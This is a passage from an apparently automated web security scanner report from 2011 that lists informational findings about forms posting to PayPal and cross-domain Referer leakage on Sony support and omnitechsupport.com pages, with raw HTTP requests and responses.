User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.15. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.16. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.17. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.18. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.19. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.20. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<td align="center"><form action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.21. http://www.omnitechsupport.com/fee.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /fee.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /fee.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.2.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49283

<html>
<head>
<title>Remote computer maintenance, remote pc help desk &amp; pc services at affordable prices</title>
<meta name="description" content="provides desktop takeover solutions, remote pc
...[SNIP]...
<tr>
                   <form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

9.22. http://www.omnitechsupport.com/spyware_removal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /spyware_removal.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<td valign="top">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr"

method="post">



<input type="image" src="images/addtocart.gif" border="0" name="submit">
...[SNIP]...

9.23. http://www.omnitechsupport.com/spyware_removal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /spyware_removal.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /spyware_removal.php HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.omnitechsupport.com/fee.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=249362713.1308841199.1.1.utmcsr=docs.sony.com|utmccn=(referral)|utmcmd=referral|utmcct=/startchat.asp; __utma=249362713.1982867696.1308841199.1308841199.1308841199.1; __utmc=249362713; __utmb=249362713.3.10.1308841199

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:15:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42222

<html>
<head>
<title>Spyware Removal | Spyware Adware Remove</title>
<meta name="description" content="Omnitechsupport.com offers complete 24/7 spyware removal services and effective spyware adware
...[SNIP]...
<tr>
                   <form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<td width="254" rowspan="2" align="center" valign="middle">
...[SNIP]...

10. Cross-domain Referer leakage  previous  next
There are 12 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


10.1. http://sonystyle.custhelp.com/cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sonystyle.custhelp.com
Path:   /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cgi-bin/sonystyle.cfg/php/xml_api/cci/feedback.php?source= HTTP/1.1
Host: sonystyle.custhelp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 15:19:29 GMT
Server: Apache
RNT-Time: D=91958 t=1308842369134448
RNT-Machine: 06
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15094

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightnow.com/crm/document">
<head>
<script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></scr
...[SNIP]...
<td class="bevel" valign="top" colspan="2">
<a href="http://esupport.sony.com/US/perl/model-accessories.pl" id="click_here" name="click_here">Click here</a>
...[SNIP]...

10.2. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/likebox.php?id=196942217311&width=248&height=291&connections=8&stream=false&header=true HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://cyberghostvpn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.131.25
X-Cnection: close
Date: Thu, 23 Jun 2011 15:25:28 GMT
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/6KGjlCsCWCK.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yS/r/fKYLFU6W_MM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/Juua_Gv7yKY.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/XhueOm5bqOx.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/PD7V_khohjs.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/NMbCdi3OCeH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/L8yUExs-fkD.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/SogayxsfDSh.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/cyberghostvpn" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187912_196942217311_3952230_q.jpg" alt="CyberGhost VPN" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/hapo06" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202955_1178794230_6332749_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/iqbalisbac" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211512_100000329032400_559174_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/Bivolty" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202967_100001269761876_1508747_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002209408909" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187225_100002209408909_2774726_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/kingofhawks" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002201855098" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/202909_100002201855098_1458152_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/27414_1313402717_8830_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/RuRoller" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/186140_1481145205_634764_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=1" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a>
...[SNIP]...

10.3. http://www.omnitechsupport.com/sony/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omnitechsupport.com
Path:   /sony/index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sony/index.php?queue=ComputerPFS&OWChat=1&VARSET_MODELNUM=VGNNR180E HTTP/1.1
Host: www.omnitechsupport.com
Proxy-Connection: keep-alive
Referer: http://www.docs.sony.com/startchat.asp?modelnum=VGNNR180E&chat=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:59:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.6
Set-Cookie: model=VGNNR180E; expires=Sat, 23-Jul-2011 14:59:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div id="topleftlogo">
           <img src="http://esupport.sony.com/graphics/site/sonylogo.jpg" width="85" height="15" border="0">
   </div>
...[SNIP]...
<div id="globalhome" ><A HREF="http://esupport.sony.com" onMouseOver=" window.status='Click here to visit Sony Electronics Support and Registration.'; return true" onMouseOut="window.status=' '; return true">
        <img src="http://esupport.sony.com/graphics/site/logo_small.jpg" border="0">
</div>

   <div id="globalhome4" >
       <A HREF="http://esupport.sony.com" onMouseOver=" window.status='Click here to visit Sony Electronics Support and Registration.'; return true" onMouseOut="window.status=' '; return true">Sony Support Home</a>
...[SNIP]...
<div id="bottomlinks">
       <a href="http://www.sony.net/SonyInfo/Support/" target="_self" onMouseOver=" window.status='Go to the Sony Global Home page.'; return true" onMouseOut="window.status=' '; return true" title="Locate Sony Support for other areas of the world."><img src="http://esupport.sony.com/graphics/site/globalhome.gif" width="78" height="9" border="0"></a>&nbsp;
       <A onmouseover=" window.status='Go to Sony Support.'; return true" onmouseout="window.status=' '; return true" href="http://esupport.sony.com/US/perl/index.pl?template_id=1" target=_self>Support Home</A>&nbsp;
       <a href="http://esupport.sony.com/US/perl/contact-land.pl?template_id=1" target="_self" onMouseOver=" window.status='Contact Sony Support.'; return true" onMouseOut="window.status=' '; return true">Contact Support</a>
       <A onmouseover=" window.status='Go to Sony.com.'; return true" onmouseout="window.status=' '; return true" href="http://www.sony.com/index.php?CMP=M:footer:esupport" target="_self">Sony.com</A>
...[SNIP]...
</A>&nbsp;
       <A style="border-right: 0px;" onmouseover=" window.status='Go to Sony Business Solutions.'; return true" onmouseout="window.status=' '; return true" href="http://b2b.sony.com/" target="_self">Business Solutions</A>
...[SNIP]...
<div id="playimgright">
       <a href="http://www.sony.com/index.php?CMP=M:footer:esupport"><img src="http://esupport.sony.com/graphics/site/sonyplay.gif" width="68" height="36" border="0"></a>
...[SNIP]...
<br />
            <a href="http://products.sel.sony.com/SEL/legal/privacy.html" target="_self">Privacy Policy/Your California Privacy Rights</a>&nbsp;|&nbsp;<a href="http://products.sel.sony.com/SEL/legal/notice.html" target="_self">Legal/Trademark</a>
...[SNIP]...

10.4. http://www.sonystyle.com/webapp/wcs/stores/servlet/CategoryDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sonystyle.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?storeId=10151&catalogId=10551&langId=-1&categoryId=8198552921644643900 HTTP/1.1
Host: www.sonystyle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
ntCoent-Length: 129492
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 23 Jun 2011 15:20:01 GMT
Connection: close
Connection: Transfer-Encoding
Cache-Control: private
Content-Length: 129492


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<link rel="canonical" href="http://www.sonystyle.com/c/Backstage-Services/e
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...
<li class="socialItem"><a class="socialLogo facebookLogo seoImage" href="http://www.facebook.com/sonyelectronics" target="_blank">Facebook</a></li>
<li class="socialItem"><a class="socialLogo twitterLogo seoImage" href="http://www.twitter.com/sonyoutletusa" target="_blank">Twitter</a>
...[SNIP]...
<li class="socialItem"><a class="socialLogo youtubeLogo seoImage" href="http://www.youtube.com/user/sonyelectronics" target="_blank">YouTube</a></li>
<li class="socialItem"><a class="socialLogo flickrLogo seoImage" href="http://www.flickr.com/groups/sonycameraclub/" target="_blank">Flickr</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Store: Right: Replacement Parts" href="https://servicesales.sel.sony.com/ecom/accessories/web/index.jsp" target="_blank">Replacement Parts</a>
...[SNIP]...
<li id="readerSpot" class="entBigPromo seoImg">
<a class="entBigPromoLink seoImg" rel="Entertainment: Reader Store" href="http://ebookstore.sony.com/" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Entertainment: PlayStation Network" href="http://us.playstation.com/psn/" target="_blank">PlayStation Network</a>
...[SNIP]...
<li id="sonyCameraClubSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank">
<h3>
...[SNIP]...
<li id="twitterSpot" class="comBigPromo seoImg">
<a class="comBigPromoLink seoImg" rel="Community: Twitter" href="http://twitter.com/sonyoutletusa" target="_blank">
<h3>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Support Forums" href="https://forum.sel.sony.com/">Support Forums</a>
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Facebook" href="http://www.facebook.com/sonyelectronics" target="_blank"><span class="facebookLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Twitter" href="http://www.twitter.com/sonyoutletusa" target="_blank"><span class="twitterLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: YouTube" href="http://www.youtube.com/user/sonyelectronics" target="_blank"><span class="youtubeLogo socialLogo">
...[SNIP]...
<li class="catItem">
<a class="catItemLink" rel="Community: Sony Camera Club" href="http://www.flickr.com/groups/sonycameraclub" target="_blank"><span class="flickrLogo socialLogo">
...[SNIP]...
